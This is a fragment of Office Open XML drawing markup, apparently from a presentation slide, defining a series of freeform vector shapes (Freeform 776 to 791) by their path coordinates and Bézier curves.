                <a:gd name="T55" fmla="*/ 16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1" h="305">
                  <a:moveTo>
                    <a:pt x="72" y="168"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="139" y="168"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="188"/>
                    <a:pt x="139" y="196"/>
                    <a:pt x="157" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="196"/>
                    <a:pt x="174" y="185"/>
                    <a:pt x="174" y="176"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="174" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="120"/>
                    <a:pt x="174" y="109"/>
                    <a:pt x="157" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="109"/>
                    <a:pt x="139" y="117"/>
                    <a:pt x="139" y="137"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72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7"/>
                    <a:pt x="196" y="78"/>
                    <a:pt x="213" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="78"/>
                    <a:pt x="231" y="67"/>
                    <a:pt x="231" y="57"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="5"/>
                    <a:pt x="228" y="0"/>
                    <a:pt x="211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7" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37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2" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72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1" name="Freeform 776">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95C0CB77-4703-4003-BBFA-6D15610A1C41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2266950" y="3476625"/>
              <a:ext cx="84138" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 109 w 183"/>
                <a:gd name="T1" fmla="*/ 31 h 305"/>
                <a:gd name="T2" fmla="*/ 163 w 183"/>
                <a:gd name="T3" fmla="*/ 31 h 305"/>
                <a:gd name="T4" fmla="*/ 183 w 183"/>
                <a:gd name="T5" fmla="*/ 16 h 305"/>
                <a:gd name="T6" fmla="*/ 163 w 183"/>
                <a:gd name="T7" fmla="*/ 0 h 305"/>
                <a:gd name="T8" fmla="*/ 21 w 183"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 0 w 183"/>
                <a:gd name="T11" fmla="*/ 15 h 305"/>
                <a:gd name="T12" fmla="*/ 21 w 183"/>
                <a:gd name="T13" fmla="*/ 31 h 305"/>
                <a:gd name="T14" fmla="*/ 74 w 183"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 74 w 183"/>
                <a:gd name="T17" fmla="*/ 275 h 305"/>
                <a:gd name="T18" fmla="*/ 21 w 183"/>
                <a:gd name="T19" fmla="*/ 275 h 305"/>
                <a:gd name="T20" fmla="*/ 0 w 183"/>
                <a:gd name="T21" fmla="*/ 290 h 305"/>
                <a:gd name="T22" fmla="*/ 21 w 183"/>
                <a:gd name="T23" fmla="*/ 305 h 305"/>
                <a:gd name="T24" fmla="*/ 163 w 183"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 183 w 183"/>
                <a:gd name="T27" fmla="*/ 290 h 305"/>
                <a:gd name="T28" fmla="*/ 163 w 183"/>
                <a:gd name="T29" fmla="*/ 275 h 305"/>
                <a:gd name="T30" fmla="*/ 109 w 183"/>
                <a:gd name="T31" fmla="*/ 275 h 305"/>
                <a:gd name="T32" fmla="*/ 109 w 183"/>
                <a:gd name="T3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09" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="163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3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74" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74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3" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="305"/>
                    <a:pt x="183" y="305"/>
                    <a:pt x="183" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="275"/>
                    <a:pt x="170" y="275"/>
                    <a:pt x="163" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="109" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109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2" name="Freeform 777">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEC9336E-5F1A-451A-AA89-269BD9912C0B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2376488" y="3476625"/>
              <a:ext cx="104775" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 73 w 228"/>
                <a:gd name="T1" fmla="*/ 31 h 305"/>
                <a:gd name="T2" fmla="*/ 101 w 228"/>
                <a:gd name="T3" fmla="*/ 31 h 305"/>
                <a:gd name="T4" fmla="*/ 121 w 228"/>
                <a:gd name="T5" fmla="*/ 16 h 305"/>
                <a:gd name="T6" fmla="*/ 101 w 228"/>
                <a:gd name="T7" fmla="*/ 0 h 305"/>
                <a:gd name="T8" fmla="*/ 20 w 228"/>
                <a:gd name="T9" fmla="*/ 0 h 305"/>
                <a:gd name="T10" fmla="*/ 0 w 228"/>
                <a:gd name="T11" fmla="*/ 16 h 305"/>
                <a:gd name="T12" fmla="*/ 20 w 228"/>
                <a:gd name="T13" fmla="*/ 31 h 305"/>
                <a:gd name="T14" fmla="*/ 39 w 228"/>
                <a:gd name="T15" fmla="*/ 31 h 305"/>
                <a:gd name="T16" fmla="*/ 39 w 228"/>
                <a:gd name="T17" fmla="*/ 275 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 228"/>
                <a:gd name="T19" fmla="*/ 275 h 305"/>
                <a:gd name="T20" fmla="*/ 0 w 228"/>
                <a:gd name="T21" fmla="*/ 290 h 305"/>
                <a:gd name="T22" fmla="*/ 20 w 228"/>
                <a:gd name="T23" fmla="*/ 305 h 305"/>
                <a:gd name="T24" fmla="*/ 208 w 228"/>
                <a:gd name="T25" fmla="*/ 305 h 305"/>
                <a:gd name="T26" fmla="*/ 228 w 228"/>
                <a:gd name="T27" fmla="*/ 285 h 305"/>
                <a:gd name="T28" fmla="*/ 228 w 228"/>
                <a:gd name="T29" fmla="*/ 240 h 305"/>
                <a:gd name="T30" fmla="*/ 211 w 228"/>
                <a:gd name="T31" fmla="*/ 220 h 305"/>
                <a:gd name="T32" fmla="*/ 193 w 228"/>
                <a:gd name="T33" fmla="*/ 240 h 305"/>
                <a:gd name="T34" fmla="*/ 193 w 228"/>
                <a:gd name="T35" fmla="*/ 275 h 305"/>
                <a:gd name="T36" fmla="*/ 73 w 228"/>
                <a:gd name="T37" fmla="*/ 275 h 305"/>
                <a:gd name="T38" fmla="*/ 73 w 228"/>
                <a:gd name="T39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305">
                  <a:moveTo>
                    <a:pt x="73" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="101" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="31"/>
                    <a:pt x="121" y="31"/>
                    <a:pt x="121" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="0"/>
                    <a:pt x="108" y="0"/>
                    <a:pt x="10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9" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39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08" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="305"/>
                    <a:pt x="228" y="300"/>
                    <a:pt x="228" y="285"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="228" y="240"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="230"/>
                    <a:pt x="228" y="220"/>
                    <a:pt x="211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3" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73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3" name="Freeform 778">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17A3DC01-EB09-4B81-9A26-BF79A6DED0A3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2495550" y="3476625"/>
              <a:ext cx="109538" cy="142875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 237"/>
                <a:gd name="T1" fmla="*/ 275 h 305"/>
                <a:gd name="T2" fmla="*/ 20 w 237"/>
                <a:gd name="T3" fmla="*/ 275 h 305"/>
                <a:gd name="T4" fmla="*/ 0 w 237"/>
                <a:gd name="T5" fmla="*/ 290 h 305"/>
                <a:gd name="T6" fmla="*/ 20 w 237"/>
                <a:gd name="T7" fmla="*/ 305 h 305"/>
                <a:gd name="T8" fmla="*/ 217 w 237"/>
                <a:gd name="T9" fmla="*/ 305 h 305"/>
                <a:gd name="T10" fmla="*/ 237 w 237"/>
                <a:gd name="T11" fmla="*/ 285 h 305"/>
                <a:gd name="T12" fmla="*/ 237 w 237"/>
                <a:gd name="T13" fmla="*/ 240 h 305"/>
                <a:gd name="T14" fmla="*/ 220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70 w 237"/>
                <a:gd name="T21" fmla="*/ 275 h 305"/>
                <a:gd name="T22" fmla="*/ 70 w 237"/>
                <a:gd name="T23" fmla="*/ 162 h 305"/>
                <a:gd name="T24" fmla="*/ 135 w 237"/>
                <a:gd name="T25" fmla="*/ 162 h 305"/>
                <a:gd name="T26" fmla="*/ 152 w 237"/>
                <a:gd name="T27" fmla="*/ 191 h 305"/>
                <a:gd name="T28" fmla="*/ 169 w 237"/>
                <a:gd name="T29" fmla="*/ 170 h 305"/>
                <a:gd name="T30" fmla="*/ 169 w 237"/>
                <a:gd name="T31" fmla="*/ 124 h 305"/>
                <a:gd name="T32" fmla="*/ 152 w 237"/>
                <a:gd name="T33" fmla="*/ 104 h 305"/>
                <a:gd name="T34" fmla="*/ 135 w 237"/>
                <a:gd name="T35" fmla="*/ 132 h 305"/>
                <a:gd name="T36" fmla="*/ 70 w 237"/>
                <a:gd name="T37" fmla="*/ 132 h 305"/>
                <a:gd name="T38" fmla="*/ 70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8 h 305"/>
                <a:gd name="T46" fmla="*/ 226 w 237"/>
                <a:gd name="T47" fmla="*/ 57 h 305"/>
                <a:gd name="T48" fmla="*/ 226 w 237"/>
                <a:gd name="T49" fmla="*/ 21 h 305"/>
                <a:gd name="T50" fmla="*/ 206 w 237"/>
                <a:gd name="T51" fmla="*/ 0 h 305"/>
                <a:gd name="T52" fmla="*/ 20 w 237"/>
                <a:gd name="T53" fmla="*/ 0 h 305"/>
                <a:gd name="T54" fmla="*/ 0 w 237"/>
                <a:gd name="T55" fmla="*/ 15 h 305"/>
                <a:gd name="T56" fmla="*/ 20 w 237"/>
                <a:gd name="T57" fmla="*/ 31 h 305"/>
                <a:gd name="T58" fmla="*/ 35 w 237"/>
                <a:gd name="T59" fmla="*/ 31 h 305"/>
                <a:gd name="T60" fmla="*/ 35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5" y="275"/>
                  </a:move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0"/>
                    <a:pt x="237" y="285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4"/>
                    <a:pt x="152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4" name="Freeform 779">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC9A372-810E-4E92-B2E2-6D3E7872A613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746375" y="3497263"/>
              <a:ext cx="87313" cy="101600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 193"/>
                <a:gd name="T1" fmla="*/ 134 h 215"/>
                <a:gd name="T2" fmla="*/ 158 w 193"/>
                <a:gd name="T3" fmla="*/ 162 h 215"/>
                <a:gd name="T4" fmla="*/ 177 w 193"/>
                <a:gd name="T5" fmla="*/ 170 h 215"/>
                <a:gd name="T6" fmla="*/ 193 w 193"/>
                <a:gd name="T7" fmla="*/ 153 h 215"/>
                <a:gd name="T8" fmla="*/ 186 w 193"/>
                <a:gd name="T9" fmla="*/ 140 h 215"/>
                <a:gd name="T10" fmla="*/ 127 w 193"/>
                <a:gd name="T11" fmla="*/ 108 h 215"/>
                <a:gd name="T12" fmla="*/ 181 w 193"/>
                <a:gd name="T13" fmla="*/ 78 h 215"/>
                <a:gd name="T14" fmla="*/ 193 w 193"/>
                <a:gd name="T15" fmla="*/ 62 h 215"/>
                <a:gd name="T16" fmla="*/ 173 w 193"/>
                <a:gd name="T17" fmla="*/ 46 h 215"/>
                <a:gd name="T18" fmla="*/ 112 w 193"/>
                <a:gd name="T19" fmla="*/ 81 h 215"/>
                <a:gd name="T20" fmla="*/ 113 w 193"/>
                <a:gd name="T21" fmla="*/ 21 h 215"/>
                <a:gd name="T22" fmla="*/ 97 w 193"/>
                <a:gd name="T23" fmla="*/ 0 h 215"/>
                <a:gd name="T24" fmla="*/ 80 w 193"/>
                <a:gd name="T25" fmla="*/ 21 h 215"/>
                <a:gd name="T26" fmla="*/ 82 w 193"/>
                <a:gd name="T27" fmla="*/ 81 h 215"/>
                <a:gd name="T28" fmla="*/ 28 w 193"/>
                <a:gd name="T29" fmla="*/ 50 h 215"/>
                <a:gd name="T30" fmla="*/ 16 w 193"/>
                <a:gd name="T31" fmla="*/ 46 h 215"/>
                <a:gd name="T32" fmla="*/ 0 w 193"/>
                <a:gd name="T33" fmla="*/ 62 h 215"/>
                <a:gd name="T34" fmla="*/ 12 w 193"/>
                <a:gd name="T35" fmla="*/ 78 h 215"/>
                <a:gd name="T36" fmla="*/ 66 w 193"/>
                <a:gd name="T37" fmla="*/ 107 h 215"/>
                <a:gd name="T38" fmla="*/ 12 w 193"/>
                <a:gd name="T39" fmla="*/ 137 h 215"/>
                <a:gd name="T40" fmla="*/ 0 w 193"/>
                <a:gd name="T41" fmla="*/ 153 h 215"/>
                <a:gd name="T42" fmla="*/ 20 w 193"/>
                <a:gd name="T43" fmla="*/ 170 h 215"/>
                <a:gd name="T44" fmla="*/ 82 w 193"/>
                <a:gd name="T45" fmla="*/ 134 h 215"/>
                <a:gd name="T46" fmla="*/ 80 w 193"/>
                <a:gd name="T47" fmla="*/ 194 h 215"/>
                <a:gd name="T48" fmla="*/ 97 w 193"/>
                <a:gd name="T49" fmla="*/ 215 h 215"/>
                <a:gd name="T50" fmla="*/ 113 w 193"/>
                <a:gd name="T51" fmla="*/ 194 h 215"/>
                <a:gd name="T52" fmla="*/ 112 w 193"/>
                <a:gd name="T53" fmla="*/ 13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12" y="134"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="151"/>
                    <a:pt x="124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3" y="161"/>
                    <a:pt x="193" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="145"/>
                    <a:pt x="187" y="140"/>
                    <a:pt x="186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3" y="71"/>
                    <a:pt x="193" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="60"/>
                    <a:pt x="193" y="46"/>
                    <a:pt x="173" y="46"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="112" y="81"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="69"/>
                    <a:pt x="113" y="36"/>
                    <a:pt x="113" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="17"/>
                    <a:pt x="113" y="0"/>
                    <a:pt x="97" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="0"/>
                    <a:pt x="80" y="17"/>
                    <a:pt x="80" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="36"/>
                    <a:pt x="81" y="69"/>
                    <a:pt x="82" y="81"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="50"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="46"/>
                    <a:pt x="20" y="46"/>
                    <a:pt x="16" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="46"/>
                    <a:pt x="0" y="55"/>
                    <a:pt x="0" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="71"/>
                    <a:pt x="5" y="74"/>
                    <a:pt x="12" y="78"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="66" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="137"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6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9"/>
                    <a:pt x="80" y="215"/>
                    <a:pt x="97" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="215"/>
                    <a:pt x="113" y="199"/>
                    <a:pt x="113" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="180"/>
                    <a:pt x="113" y="147"/>
                    <a:pt x="112" y="1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5" name="Freeform 780">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DB6D8E5-52BA-47F3-8004-01B94D83EF16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2867025" y="3516313"/>
              <a:ext cx="88900" cy="104775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9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2" y="90"/>
                    <a:pt x="92" y="88"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65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6"/>
                    <a:pt x="146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1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6" name="Freeform 781">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B902F14E-F474-43E3-A679-C921D6397604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976563" y="3489325"/>
              <a:ext cx="96838" cy="131763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199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19 w 211"/>
                <a:gd name="T23" fmla="*/ 91 h 279"/>
                <a:gd name="T24" fmla="*/ 63 w 211"/>
                <a:gd name="T25" fmla="*/ 91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9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199" y="91"/>
                    <a:pt x="199" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199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1"/>
                    <a:pt x="12" y="91"/>
                    <a:pt x="19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7" name="Freeform 782">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692C9C92-73BF-435B-8D23-D129D5EFA6FC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098800" y="3516313"/>
              <a:ext cx="103188" cy="103188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0 h 218"/>
                <a:gd name="T4" fmla="*/ 205 w 226"/>
                <a:gd name="T5" fmla="*/ 52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0 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 226"/>
                <a:gd name="T13" fmla="*/ 23 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 226"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 19 w 226"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 226"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 19 w 226"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 226"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 226"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 19 w 226"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 226"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 19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8 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 226"/>
                <a:gd name="T39" fmla="*/ 188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5" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="52"/>
                    <a:pt x="226" y="44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1" y="3"/>
                    <a:pt x="74" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="19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19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8" name="Freeform 783">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E67AE58-0319-40F5-A116-B8926A1C1585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3224213" y="3516313"/>
              <a:ext cx="92075" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 203"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 105 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 203"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 203"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 203 w 203"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 203"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 203"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 203"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 203"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 203"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 35 w 203"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 203"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168 w 203"/>
                <a:gd name="T27" fmla="*/ 94 h 222"/>
                <a:gd name="T28" fmla="*/ 35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184" y="124"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="194" y="124"/>
                    <a:pt x="203" y="124"/>
                    <a:pt x="203" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203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9" name="Freeform 784">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D1A81E-479B-463D-8C00-25491509FA67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3343275" y="3516313"/>
              <a:ext cx="107950" cy="104775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5 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 57 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 30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4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8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4"/>
                    <a:pt x="57" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="32"/>
                    <a:pt x="58" y="31"/>
                    <a:pt x="68" y="30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8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0" name="Freeform 785">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC03049-AE1F-4E55-B996-ADC6EBFFF3CD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3449638" y="3516313"/>
              <a:ext cx="119063" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 259"/>
                <a:gd name="T9" fmla="*/ 33 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 30 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 259"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 259"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 259"/>
                <a:gd name="T43" fmla="*/ 30 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202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8 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187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1" name="Freeform 786">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B06D29C-5BC4-403F-B95B-116E7B0AF8CB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611563" y="3590925"/>
              <a:ext cx="38100" cy="60325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50 h 131"/>
                <a:gd name="T10" fmla="*/ 42 w 83"/>
                <a:gd name="T11" fmla="*/ 0 h 131"/>
                <a:gd name="T12" fmla="*/ 10 w 83"/>
                <a:gd name="T13" fmla="*/ 31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4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4"/>
                    <a:pt x="83" y="50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50"/>
                    <a:pt x="25" y="62"/>
                    <a:pt x="41" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="62"/>
                    <a:pt x="48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2" name="Freeform 787">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92D183D1-D833-44DF-90D1-FFBCBC293A47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3827463" y="3516313"/>
              <a:ext cx="90488" cy="104775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4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1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="87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4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0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3" name="Freeform 788">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD6D6ED8-4F63-4660-8FA5-2E7D35136D27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3944938" y="3516313"/>
              <a:ext cx="93663" cy="1047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6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4" name="Freeform 789">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3711C5BB-81B2-40D7-916F-EB035325E2D8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054475" y="3516313"/>
              <a:ext cx="114300" cy="103188"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 249"/>
                <a:gd name="T1" fmla="*/ 27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8 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77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5" name="Freeform 790">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A07CB8C-7758-4F94-B858-08DB30FBFD28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4187825" y="3516313"/>
              <a:ext cx="88900" cy="104775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8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8"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64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1"/>
                    <a:pt x="34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6" name="Freeform 791">
              <a:extLst>
